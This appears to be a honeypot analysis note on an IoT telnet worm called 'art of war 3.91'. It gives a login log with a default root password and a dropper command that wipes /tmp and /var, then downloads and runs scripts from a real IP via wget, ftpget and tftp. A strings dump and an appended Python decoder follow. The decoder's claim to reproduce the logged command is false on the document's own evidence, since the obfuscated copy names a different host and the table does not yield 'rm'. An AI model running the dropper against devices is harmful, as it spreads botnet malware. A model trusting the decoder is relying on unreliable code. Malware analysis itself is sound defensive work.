name of the virus: art of war 3.91

this is a worm


spreading from: 91.185.190.172

info (about the spreading host):
anonymous ftp allowed
web server: nginx on debian

name:
the name comes from these strings found in the binary ("art of war" 3.91):
ARTOF
WAR3.91WAR


log file:
New connection: 197.149.60.96:51509 (192.168.1.5:2223) [session: TT1897]
login attempt [root/xc3511] succeeded
Opening TTY Log: log/tty/20160926-185629-None-1897i.log
CMD: sh
Command found: sh
CMD: shell
Command not found: shell
CMD: rm -f /tmp/* /var/* /var/run/* /var/tmp/*;cd /tmp || cd /var || cd /var/run || cd /var/tmp || cd /dev/shm || cd /dev;busybox wget http://91.185.190.172/bin.sh;sh bin.sh;busybox ftpget -u anonymous -p anonymous 91.185.190.172 bin2.sh bin2.sh;sh bin2.sh;busybox tftp -r bin3.sh -g 91.185.190.172;sh bin3.sh
Command found: sh bin3.sh
Command found: busybox tftp -r bin3.sh -g 91.185.190.172
Command found: sh bin2.sh
Command found: busybox ftpget -u anonymous -p anonymous 91.185.190.172 bin2.sh bin2.sh
Command found: sh bin.sh
Command found: busybox wget http://91.185.190.172/bin.sh
Command found: cd /dev
Command found: cd /dev/shm
Command found: cd /var/tmp
Command found: cd /var/run
Command found: cd /var
Command found: cd /tmp
Command found: rm -f /tmp/* /var/* /var/run/* /var/tmp/*
Command found: wget http://91.185.190.172/bin.sh
Downloaded URL (http://91.185.190.172/bin.sh) with SHA-256 1c810dd4d792718a7f68e11bdb9fc32596f73c1ae6039ecd2ea1bbf9a8a5ceed to dl/1c810dd4d792718a7f68e11bdb9fc32596f73c1ae6039ecd2ea1bbf9a8a5ceed
connection closed





files (file(1) output for the downloaded binaries):
arm4:         ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
arm5:         ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
arm7:         ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, stripped
m68k:         ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
mips:         ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mipsel:       ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
ppc:          ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, stripped
sh4:          ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
sparc:        ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped


possible original source: 80.94.81.63 or 4.317.334.359 (from strings)
in -u /gnk/* /exi/* /exi/ifm/* /exi/gnk/*;yz /gnk || yz /exi || yz /exi/ifm || yz /exi/gnk || yz /zve/hsn || yz /zve;wfhcwla btvg sggk://80.094.081.063/wrm.hs;hs wrm.hs;wfhcwla ugktvg -f xmlmcnlfh -k xmlmcnlfh 80.094.081.063 wrm3.hs wrm3.hs;hs wrm3.hs;wfhcwla gugk -i wrm2.hs -t 80.094.081.063;hs wrm2.hs

some other strings:
INFECT %s:%s:%s
BUILD %s
.shstrtab	reginfo
ittexf
voda#
eh_frame	ctors
djcr
."go5w
com/n
bug.ii32
ARTOF
WAR3.91WAR
 !/proc/self/exe7
f?S#
mdebug.ii32
trtab	reginfo
ABCDEFGHIJKLMN
OPQRSTUVZYWXabcdefghijklmnopqrst
uvzywx0123456789:/. ->#$%;|*K
XWYZVUTSRQPONMLKJIHGFEDCBAxwyzv
utsrqponmlkjihgfedcba1032547698a
eh_frame	ctors
KRMT
%d.%d.%d.%d
/proc/scsi/scsi
4.317.334.359
REPORT %s:%s:%s
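The obfuscated copy of the dropper command above and the two alphabet strings in the dump fit together as a simple letter/digit substitution table. The following Python decoder is an added example, not part of the original note; it assumes (my reading of the dump) that the two 62-character runs are the plain and substituted alphabets and that punctuation passes through unchanged, and it checks the result against the command the honeypot actually recorded.

```python
import re

# Added example: the two alphabet strings from the dump, read as the plain
# and substituted alphabets of a character-substitution table (assumption;
# the trailing ":/. ->#$%;|*K" and the lone "a" are ignored because
# punctuation appears unchanged in the obfuscated command).
PLAIN_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVZYWXabcdefghijklmnopqrstuvzywx0123456789"
SUBST_ALPHABET = "XWYZVUTSRQPONMLKJIHGFEDCBAxwyzvutsrqponmlkjihgfedcba1032547698"
_TABLE = str.maketrans(SUBST_ALPHABET, PLAIN_ALPHABET)

# Obfuscated dropper command exactly as it appears in the strings dump.
OBFUSCATED_CMD = (
    "in -u /gnk/* /exi/* /exi/ifm/* /exi/gnk/*;yz /gnk || yz /exi || "
    "yz /exi/ifm || yz /exi/gnk || yz /zve/hsn || yz /zve;"
    "wfhcwla btvg sggk://80.094.081.063/wrm.hs;hs wrm.hs;"
    "wfhcwla ugktvg -f xmlmcnlfh -k xmlmcnlfh 80.094.081.063 wrm3.hs wrm3.hs;"
    "hs wrm3.hs;wfhcwla gugk -i wrm2.hs -t 80.094.081.063;hs wrm2.hs"
)
# The same command as the honeypot recorded it, used as the reference.
OBSERVED_CMD = (
    "rm -f /tmp/* /var/* /var/run/* /var/tmp/*;cd /tmp || cd /var || "
    "cd /var/run || cd /var/tmp || cd /dev/shm || cd /dev;"
    "busybox wget http://91.185.190.172/bin.sh;sh bin.sh;"
    "busybox ftpget -u anonymous -p anonymous 91.185.190.172 bin2.sh bin2.sh;"
    "sh bin2.sh;busybox tftp -r bin3.sh -g 91.185.190.172;sh bin3.sh"
)


def decode(obfuscated: str) -> str:
    """Map every substituted letter/digit back; other characters pass through."""
    return obfuscated.translate(_TABLE)


def is_involution() -> bool:
    """True if decoding twice returns the input, i.e. encode == decode."""
    return all(decode(decode(c)) == c for c in PLAIN_ALPHABET)


def extract_hosts(command: str) -> set:
    """Dotted-quad addresses in a decoded command, for comparison with the log."""
    return set(re.findall(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])", command))


if __name__ == "__main__":
    decoded = decode(OBFUSCATED_CMD)
    print(decoded)
    print("matches honeypot log:", decoded == OBSERVED_CMD)
    print("download host(s):", extract_hosts(decoded))
```

Because the table is its own inverse, the same function also decodes the other letter/digit strings in the dump.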



signatures:
